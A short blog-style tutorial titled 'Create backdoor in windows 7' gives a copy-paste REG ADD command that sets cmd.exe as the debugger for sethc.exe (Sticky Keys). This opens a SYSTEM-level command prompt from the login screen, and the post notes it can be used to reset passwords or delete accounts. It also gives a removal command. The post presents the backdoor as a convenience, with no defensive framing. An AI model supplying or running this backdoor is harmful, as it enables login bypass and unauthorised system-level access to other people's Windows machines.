Create backdoor in windows 7

By
, ,

First of all let's talk a little about backdoor and how it can be useful to you. The backdoor provides you the power to open up the command prompt(cmd) from the login screen of window 7. Well from cmd you can use commands like net user user_name * to set up a new password, net user user_name /del to delete a user account, explorer.exe to open up the explorer and a lot more.

Here are the steps to create the backdoor

Running Cmd As Admin
  • Click on start type cmd, right click on the program cmd and select run as administrator.

  • Now copy command from below, paste the command(right click select paste) inside cmd and press enter.
    • REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
    • This command creates a registry entry which runs the cmd.exe as a debugger for sethc.exe
  • Running the command

  • That's all just a simple copy and paste to create a backdoor. From now on you can open up a command prompt with system privilege by pressing either the SHIFT key continuously for 5 times or Alt+Shift+PrintScreen.

Steps to remove the backdoor from your system

  • To remove the backdoor from the windows 7 copy the following command and paste it inside the cmd.
    • REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe

17 comments:

a